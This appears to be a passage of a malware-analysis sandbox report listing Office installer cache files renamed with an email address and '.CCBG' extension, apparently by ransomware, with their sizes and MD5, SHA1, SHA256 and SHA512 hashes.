C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.msi[[email protected]].CCBG
Filesize1.7MB
MD53f40a38c715abdcf90d4f84bf70f626c
SHA14645d022abe515a315d841dfd2cff9e5371bab6b
SHA2566769846d4096cbfe8aff54a8ea6ba406116951a745da5c866afe3046274b80bc
SHA51286dae6fddfe7c0659e1bf0d438062ff24e5df5428b9c749029d2120bf20f4b8d5639ac21a76bab2284b4c9ab480504313bce20902f5603030bc7aa2eb65eabec
-
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.xml[[email protected]].CCBG
Filesize1KB
MD59fe90518889fdd957c30e8b5d8b82ad0
SHA1f27d65d782a84ef1fd94556b442b2edbb6bc02c5
SHA256360fcc55ade0a51cace4f4902159c3606d80d83fa783d6004a491b2628869b91
SHA5120c40532bc4eb276ce2216176123803a6305d23dd5877b52447864fb3da78941d6f8e2274cd18353e7be2d990801d5af740da8ef4298a59092ae963acb1b63c43
-
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PptLR.cab[[email protected]].CCBG
Filesize33.6MB
MD557baf2114e72df590e28d77d777413a6
SHA1136c12b080899c2ab4ba14cb66289432724215b6
SHA256d2469621eb4297dfb19ba94761ab4258243894cc7a4dddd409fcfaa80e616529
SHA51285b4ebefa22edb1ecb91b79853bfff5897505cd69147f7702324b13aecbd8f5fd2331e9f43b8ce0137fb75fe3327f53850572ea27340a548b06e93336d6cb6fa
-
Filesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Setup.xml[[email protected]].CCBG
Filesize2KB
MD541ac5b7821329e9dc72e3bb8dfffb0d0
SHA12f47007d26e5746bf1b39ddeec1f7cef4d9467c2
SHA256f7ff1688f7122c435bada7d1f43de7834bd688013b3162ad88fb22bc120d14a3
SHA5123ee3b9f0d3a6681023f012ce038ee9d281640f3fb2ee073492a7f4c479402f58d695867374c6faadc914764fbf910409ceab84f59de51d2c1cb2a0b7edd91d4e
-
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PubLR.cab[[email protected]].CCBG
Filesize9.5MB
MD589d8232351e9a781a00831d7479e4974
SHA12e1c744d71a496b6d301a88de6163937385ff382
SHA256a847bbd1851f9e19458b71ea301f08a984c90572386fefecc486115c9185d375
SHA5125c198ee60372cee6d97fa6d021f122e9cebee6475216b1506516e40a812335e669976516ecd219fc5020688cc16fa4ec41823ab1c36914b6cb9795f3e1555a63
-
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.msi[[email protected]].CCBG
Filesize1.7MB
MD54862b6d201dbbce45a2eb96ddf7ab2a2
SHA185fc48c3e53666b33a9802b9e6d41d190525ad41
SHA256d3ea3141bf02975bff208a6f41f72bc790b2d930a07817a3f42abc5bb764afc9
SHA512efce11a44fa4cb2ddf7b0a604e0f9fdb5f24c84d782fa14c4912648e951feb5dfeeae902127ac1636dd1ccd1078fa4a5fe731a4632d09cea93332fb5c8659f11
-
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.xml[[email protected]].CCBG
Filesize1KB
MD57786bcdc41e92d5cc3bc56dff0c61535
SHA16cbc5db4bd01063e87fab568c40e0e6b557270c8
SHA256365b8cb0790427eb7c96381053f585a52547d7a9e2e76e00fa6984be04bd8bc0
SHA512b3b67dda63c38ac816f1a631846474b4bbc254f164c75d5ff6300e6d19d0c07c60a83788fa3061627c08b2c3b0230bd9868f0eee5d2f1fe040e5e4a81fcba219
-
Filesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\Setup.xml[[email protected]].CCBG
Filesize1KB
MD596d2e464adb672a0bb6f6398089e2f39
SHA145161a2a34eeafed90fc641dc7b01007be0d7df4
SHA256f18fc862cba61b0154ed7b8def730d3464671b0d077de9051a37d5a534810a57
SHA512edf6b76957aee708fc0da42a2dafbc7a0d058a8f63399a8b66b704dc6ea3c6dfcf29a2c8243ae25bc5f04a09dbaaf9f4f94419743b4a875177a589c1357888f2
-
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlkLR.cab[[email protected]].CCBG
Filesize14.1MB
MD5636f68a99eea9c36701ff41d073473ed
SHA113a1656b3f29987639f0e86d7730915556d6a293
SHA2560d9c728ab012358bc5a860b2dafe43d5f7e87bd558a2272b9186898915d43df5
SHA512e4f25502f4a5054b083bc811e56f4ef48dd965663267d391b8a58c2c2612b2a21546676fef8f7a0cb31924b94d7abf3afff7716d396e65ef7486630b5d3f352d
-
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.msi[[email protected]].CCBG
Filesize2.0MB
MD5bc2a7636c931f2d58fb70d7379a08f35
SHA188663f695f6ec430383849837a9fe5c321b1c100
SHA25618706e73d97594faeddb74445a2aebe23c58c08a1611765799a097d9ff5f0f06
SHA51298318652c34813d597ef6bc4f9cb3fc75ae41611f4883d9e41e21413a8226cb27f2f430b48a27cb53a2b94ce05540e65570933b80f1f499eb92ccf698bfeb53e
-
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.xml[[email protected]].CCBG
Filesize3KB
MD56a11c020013090715c2532e0199e3126
SHA147abcf2013c743892b68691095a43bb1028a202b
SHA256a6bcdf2b668d107a74bd2afb55253c38fe6ceda577617c3f6085ebea9742509f
SHA512c21ab13b81d65a21bffff116f799629585346ae3b2773c04d32dfc95c71e6c0ada0b7da80e8e93bf98a47591420e1233d04ac90e420b93903a149f9fdac187db
-
Filesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Setup.xml[[email protected]].CCBG
Filesize4KB
MD5eeae4f4e43d957bda8ecd13c218b40df
SHA1cdce1f12a984a90cf30e84998eebe23e1105510e
SHA25628355fc87de37cf7ed57777a7a19c7c567c1da5258e31a72d77fefd070bdb64a
SHA512ccd288aeee8d9595a46530af794592c0140cad5bf3e5219c76199b0b441e2a719ac4c58eba2ca749ff5e38b650be572e67462e79c0f6b80847061792d7b46b2c
-
Filesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Setup.xml[[email protected]].CCBG
Filesize2KB
MD522f9da4d2784f66a43a39f24111e6d30
SHA17bffc57cfccc5b693d6724e9ba314a5a0b836a71
SHA256d0a3ae925c3c97e178d18bf2d15c8b8f08f0e187eb7b1bf7a374384f439a8f45
SHA512d1337c94952e84870f85c0b682c718c94b223b96cf1be907633fbfb812977d24d29a316f4adf23377851b03b22ed7027303ed0bc63df540735aff0841744eb1f
-
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordLR.cab[[email protected]].CCBG
Filesize31.9MB
MD5c438431310afeaa2f29154ef7b3749bb
SHA1799cddd1eb7fc1bc952b827ee179612c160cfba2
SHA256353c14fa6894aabf4e72b4bbee4c9465f4e7e23725c7cd6a42bc64a429d21da5
SHA5128efd58458b3857f3d87cbab977a34250fbb9610331c61b820cac058f3ef455be53bfdb3f3d36e22e97b6e1b020032c78a239354069c00686905fdb0c8a5e7b82
-
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.msi[[email protected]].CCBG
Filesize1.7MB
MD56d3a734f324af2fb316af72fd675176b
SHA1aa0aa999bce6217ed1d6f494e0e4c7fc670f90e7
SHA2566d86d52911ef992b19b9de6cf70e633cb1f39a6aaa5afec12063ec634815efd0
SHA51222472d31c6e976a68814945f68570e7c8b5f72ff6a69b7a621534c11acc788e8a5c785d394288dd931c6b6082be8e5db4508554387f803a60501669a4ce4f46f
-
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.xml[[email protected]].CCBG
Filesize2KB
MD514b14f4db80910f8f9291550f3a9cdce
SHA1bfcb3b07a831bb3984936dee51f3f76e0a8e0e8c
SHA2565a62b1bae2e250ea09ff3f82917c261586b7fc5acb8c19d20bb20c248c8c5a7e
SHA5124e338b331272182fb8893ba67a32620051899cfb5fac805d1c7c1a7e0660beb0bd93c530e77c12ff92c50829cff055558900dd6b37ab49e19d3ebf2c39066ccc
-
Filesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
Filesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
Filesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
Filesize
1.1MB
MD5a56644a519d6fce5f20a744ae3820af2
SHA193acd978da4a602c9ea1a23b6a97d74ced436e56
SHA256563daaab9f9d7be02f037c540d561c424aa3e5efc6a9a5c8d58858d98e2aae3c
SHA5125ee5ae6d10bb4c3290664454666bd5f82d694bb772d9d5e6dc9e29cb7129cf696ac5b694676eb78074e4196a459e66f6b34b920017af1cd2addb35a1e1b85416
-
Filesize
1.1MB
MD5a56644a519d6fce5f20a744ae3820af2
SHA193acd978da4a602c9ea1a23b6a97d74ced436e56
SHA256563daaab9f9d7be02f037c540d561c424aa3e5efc6a9a5c8d58858d98e2aae3c
SHA5125ee5ae6d10bb4c3290664454666bd5f82d694bb772d9d5e6dc9e29cb7129cf696ac5b694676eb78074e4196a459e66f6b34b920017af1cd2addb35a1e1b85416
-
Filesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
Filesize
1KB
MD55f893cd90fd96c2629c5ad5eb3e4f290
SHA1f1cf818c48f974018970753e5636d6d2aade297c
SHA25628ed8462f2207cc4b8f7b887a78e24074e6287425015deb9bdbfa2a1de60d252
SHA51200c4bb3f2789068ca70d8fea3bba68af4dabaf121a479a2169216dda0537dad69101db52049a1fcf2fac77fbb9eeeef68d3821a584feab741a1ecb86c0745565
-
Filesize
1KB
MD54d428091b2808d90b7945c27b2c23a04
SHA1d74afbc10ad68549bb9b27132b573d980785c2a7
SHA25600eb0cf67c2cfa7f93b67c3320e897effb70d022dce30a40a70f044a4d9518e2
SHA51290ec5493e498dc102ad22f708a8fd334e9f4311101f5534f99c5fd773d9e9db9441832942eefdfefb8d32c223635bcfa6af79b5cef47508adb7afe3c5b4a18a7
-
Filesize
138B
MD5702f5dc6f9dec28c8c9b7b6885c9fe09
SHA1dbb85da6de899deb21ce0a8f25c1726cd19e49e8
SHA25620bf5224af318c449407c99e5f4628f71b874463a1cb777031a43b6236ab97e9
SHA512fa4bfc3ac77561585d03bf62e7bb4de0602cf442b5c54b70945f8c75114d111559f50ad36026e2bb1027323f7f50130b7c60bee22835400a8a07feab436ccff7
-
Filesize
138B
MD5702f5dc6f9dec28c8c9b7b6885c9fe09
SHA1dbb85da6de899deb21ce0a8f25c1726cd19e49e8
SHA25620bf5224af318c449407c99e5f4628f71b874463a1cb777031a43b6236ab97e9
SHA512fa4bfc3ac77561585d03bf62e7bb4de0602cf442b5c54b70945f8c75114d111559f50ad36026e2bb1027323f7f50130b7c60bee22835400a8a07feab436ccff7
-
Filesize
686B
MD5e9c50acda9063b2462697bdbd0a0dfe2
SHA1d1a2bc54905ce0e9121f8e5c249e0527f2190b7e
SHA256f236c75a867944ce27e123b3aaf3a465084bc6135dc453f7f4aacb1cbf9946bd
SHA512d5cd841b82867e323f5cd28f97c9a27ea32be1b3793cb7ddff1ccc3c0559c6b3758f6366d259eda2265431f67a1eebe41dcfb2047ee94c515eb458af6311b8a9
-
Filesize
686B
MD5e9c50acda9063b2462697bdbd0a0dfe2
SHA1d1a2bc54905ce0e9121f8e5c249e0527f2190b7e
SHA256f236c75a867944ce27e123b3aaf3a465084bc6135dc453f7f4aacb1cbf9946bd
SHA512d5cd841b82867e323f5cd28f97c9a27ea32be1b3793cb7ddff1ccc3c0559c6b3758f6366d259eda2265431f67a1eebe41dcfb2047ee94c515eb458af6311b8a9
-
Filesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
Filesize
419B
MD5fdf5d2f6680ad3783f23c05acc052bf9
SHA14e2be3dec1a71b54f6de671dea343bf5ba814783
SHA2563ca21e6072d41a6f94f7407509b7ac53b10c0619e1b3fe159cfdd3e773b3e1c5
SHA512d24bf4de24037c32af0e10de18fbc5a70e39b5b00d2583eb1161b0f1eacd58928040fb041dc7ed3652375a2fd022149395472345b4f1491d8aff64a23aa070e3
-
Filesize
2.2MB
MD5b555ce6924de8b22121d29a6a153d3fa
SHA149e5a197e7e4e5bded33820a55ab664c370c9794
SHA2560c6a37537be50d03c4c7d7fb1d64e881a2c363185712a1c0e1e2c86f2faf3f19
SHA5121109aa9a26c2baec61fba873e4e27bbc4871e88366301dc32b7fd7383ea83da6d32ab8173db66c211b1ef3e334e1427370da19d77da8b804a71118bdbe35a1e0
-
Filesize
2.2MB
MD5b555ce6924de8b22121d29a6a153d3fa
SHA149e5a197e7e4e5bded33820a55ab664c370c9794
SHA2560c6a37537be50d03c4c7d7fb1d64e881a2c363185712a1c0e1e2c86f2faf3f19
SHA5121109aa9a26c2baec61fba873e4e27bbc4871e88366301dc32b7fd7383ea83da6d32ab8173db66c211b1ef3e334e1427370da19d77da8b804a71118bdbe35a1e0
-
Filesize
2.2MB
MD5b555ce6924de8b22121d29a6a153d3fa
SHA149e5a197e7e4e5bded33820a55ab664c370c9794
SHA2560c6a37537be50d03c4c7d7fb1d64e881a2c363185712a1c0e1e2c86f2faf3f19
SHA5121109aa9a26c2baec61fba873e4e27bbc4871e88366301dc32b7fd7383ea83da6d32ab8173db66c211b1ef3e334e1427370da19d77da8b804a71118bdbe35a1e0
-
Filesize
2.2MB
MD5b555ce6924de8b22121d29a6a153d3fa
SHA149e5a197e7e4e5bded33820a55ab664c370c9794
SHA2560c6a37537be50d03c4c7d7fb1d64e881a2c363185712a1c0e1e2c86f2faf3f19
SHA5121109aa9a26c2baec61fba873e4e27bbc4871e88366301dc32b7fd7383ea83da6d32ab8173db66c211b1ef3e334e1427370da19d77da8b804a71118bdbe35a1e0
-
Filesize
2.2MB
MD5b555ce6924de8b22121d29a6a153d3fa
SHA149e5a197e7e4e5bded33820a55ab664c370c9794
SHA2560c6a37537be50d03c4c7d7fb1d64e881a2c363185712a1c0e1e2c86f2faf3f19
SHA5121109aa9a26c2baec61fba873e4e27bbc4871e88366301dc32b7fd7383ea83da6d32ab8173db66c211b1ef3e334e1427370da19d77da8b804a71118bdbe35a1e0
-
Filesize
562KB
MD5d388df6ed5ccbf1acdeda5af2d18cb0b
SHA1124d3c2ba93644ac6c2d7253de242b46be836692
SHA2568bcfd8420d721cc0ca50c1bef653e63e013ce201dfcca5927228eb25c9abf606
SHA512f45200d296f4956ec2c39115095559e7825a748b5481c1a3244edf362a49c40b90d778fcdf4bf629095661d96879c96259574d9bfc29d81b6b14f19f4c32d234
-
Filesize
562KB
MD5d388df6ed5ccbf1acdeda5af2d18cb0b
SHA1124d3c2ba93644ac6c2d7253de242b46be836692
SHA2568bcfd8420d721cc0ca50c1bef653e63e013ce201dfcca5927228eb25c9abf606
SHA512f45200d296f4956ec2c39115095559e7825a748b5481c1a3244edf362a49c40b90d778fcdf4bf629095661d96879c96259574d9bfc29d81b6b14f19f4c32d234
-
Filesize
562KB
MD5d388df6ed5ccbf1acdeda5af2d18cb0b
SHA1124d3c2ba93644ac6c2d7253de242b46be836692
SHA2568bcfd8420d721cc0ca50c1bef653e63e013ce201dfcca5927228eb25c9abf606
SHA512f45200d296f4956ec2c39115095559e7825a748b5481c1a3244edf362a49c40b90d778fcdf4bf629095661d96879c96259574d9bfc29d81b6b14f19f4c32d234
-
Filesize
562KB
MD5d388df6ed5ccbf1acdeda5af2d18cb0b
SHA1124d3c2ba93644ac6c2d7253de242b46be836692
SHA2568bcfd8420d721cc0ca50c1bef653e63e013ce201dfcca5927228eb25c9abf606
SHA512f45200d296f4956ec2c39115095559e7825a748b5481c1a3244edf362a49c40b90d778fcdf4bf629095661d96879c96259574d9bfc29d81b6b14f19f4c32d234
-
Filesize
562KB
MD5d388df6ed5ccbf1acdeda5af2d18cb0b
SHA1124d3c2ba93644ac6c2d7253de242b46be836692
SHA2568bcfd8420d721cc0ca50c1bef653e63e013ce201dfcca5927228eb25c9abf606
SHA512f45200d296f4956ec2c39115095559e7825a748b5481c1a3244edf362a49c40b90d778fcdf4bf629095661d96879c96259574d9bfc29d81b6b14f19f4c32d234
-
Filesize
481KB
MD56f5f3843fa88734e3cc5f72cff0c1be4
SHA1d01a24975b7df762db855c553d6bdb960fcd012c
SHA2566b27c9019a3209f807cf5c3f5e78ed4c03717967811a7b94eddc63960e55c8c2
SHA5129461d7f2bdf9d3e79b12cc8c558c20451a68f37560d16933e6cd2d3eab3ec5b1d2acd5a87d81889945f6e7832f0895d56dbdc4721d47ec86f3db934c1c333219
-
Filesize
481KB
MD56f5f3843fa88734e3cc5f72cff0c1be4
SHA1d01a24975b7df762db855c553d6bdb960fcd012c
SHA2566b27c9019a3209f807cf5c3f5e78ed4c03717967811a7b94eddc63960e55c8c2
SHA5129461d7f2bdf9d3e79b12cc8c558c20451a68f37560d16933e6cd2d3eab3ec5b1d2acd5a87d81889945f6e7832f0895d56dbdc4721d47ec86f3db934c1c333219